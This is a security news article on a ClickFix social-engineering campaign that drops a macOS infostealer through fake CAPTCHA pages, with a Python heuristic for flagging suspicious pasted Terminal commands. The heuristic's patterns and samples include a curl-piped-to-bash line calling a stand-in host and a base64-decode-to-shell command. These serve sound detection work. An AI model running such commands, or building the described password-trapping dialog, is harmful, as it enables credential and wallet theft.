A sophisticated cross-platform social engineering campaign, dubbed ClickFix, has evolved to target macOS users with a relentless new infostealer. According to a recent report from Netskope Threat Labs, the campaign uses deceptive “technical support” lures to trick users into infecting their own machines, eventually holding their user interface hostage until they surrender their system password.
The attack begins when a user visits a compromised landing page. Using client-side JavaScript, the attackers filter victims by their “user-agent” string. Mobile users are ignored, while desktop users are funneled to a fake CAPTCHA or browser update page. The site then presents a malicious command and instructs the user to paste it into their Terminal.
As Netskope notes:
“ClickFix lures victims into manually copying and pasting a malicious command, typically into the Windows Run dialog or a terminal under the guise of a ‘browser update’ or ‘CAPTCHA verification’”.
Once executed, a background script silently establishes a staging directory and prepares for data exfiltration.
The most striking feature of the macOS payload is its credential harvesting method. The malware deploys an AppleScript-based dialog box that mimics a legitimate system prompt, complete with authentic macOS icons.
Unlike real system prompts, this one is non-closable. It uses a continuous loop to validate the user’s password in real-time via macOS Directory Services.
As the report highlights:
“If incorrect, the dialog immediately reappears, holding the UI hostage until a valid password is provided”.
By capturing the plaintext login password, attackers can easily decrypt the victim’s macOS Keychain, which contains saved passwords, Wi-Fi keys, and cryptographic certificates.
The infostealer is designed to be exhaustive. Once it has the system password, it harvests:
- 12 Chromium-based Browsers: Including Chrome, Edge, Brave, Arc, and Opera.
- 200+ Browser Extensions: Targeting password managers like LastPass and 1Password, as well as 2FA apps like Authy.
- Cryptocurrency Wallets: The script targets 16 standalone desktop wallets (such as Ledger Live, Exodus, and Atomic) and dozens of browser-based wallets like MetaMask and Phantom.
By stealing live session cookies, threat actors can “bypass multi-factor authentication (MFA) by hijacking active sessions to gain direct access to corporate and personal accounts”.
The latest versions of macOS Tahoe (26.4) and macOS Sequoia introduce a native Terminal security warning. This feature is specifically designed to disrupt ClickFix-style attacks by alerting users when they attempt to paste potentially harmful commands from an untrusted source.
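As an added illustration (not code from the Netskope report or from Apple's Terminal feature), the following Python heuristic shows the kind of check a paste guard or endpoint agent can run on text about to be pasted into a Terminal; the indicator patterns, their weights and the constructed sample commands are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from typing import List

# Heuristic indicators of ClickFix-style paste payloads (assumed for this
# example, not a published rule set): each is (regex, weight, explanation).
INDICATORS = [
    (r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b", 4, "download piped to a shell"),
    (r"\bbase64\s+(-d|--decode|-D)\b", 3, "base64-decoded payload"),
    (r"\bosascript\s+-e\b", 3, "inline AppleScript execution"),
    (r"\bchmod\s+\+x\b", 1, "marks a downloaded file executable"),
    (r">\s*/dev/null\s+2>&1", 2, "output suppressed"),
    (r"\bnohup\b|&\s*$", 1, "process backgrounded"),
    (r"\bmkdir\s+-p\s+(/tmp|\$HOME|~)", 1, "creates a staging directory"),
]

@dataclass
class PasteVerdict:
    score: int
    reasons: List[str]

    @property
    def block(self) -> bool:
        # Threshold chosen so a single download-and-execute pipe is enough to warn.
        return self.score >= 4

def score_pasted_command(text: str) -> PasteVerdict:
    """Return a weighted score and the matched reasons for a pasted command."""
    score, reasons = 0, []
    for pattern, weight, why in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE | re.MULTILINE):
            score += weight
            reasons.append(why)
    return PasteVerdict(score, reasons)

# Constructed samples: two ClickFix-shaped commands and two benign ones.
SAMPLES = {
    "pipe": "curl -fsSL https://fix.invalid/update | bash",
    "b64": "echo ZWNobyBoaQ== | base64 -d | bash > /dev/null 2>&1 &",
    "brew": "brew update && brew upgrade",
    "ls": "ls -la > /dev/null 2>&1",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        v = score_pasted_command(cmd)
        print(f"{name}: score={v.score} block={v.block} reasons={v.reasons}")
```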
Netskope researchers emphasize that while technical defenses are improving, “social engineering remains a primary threat”. Users are urged to remain vigilant and never execute Terminal commands provided by websites to “fix” browser errors.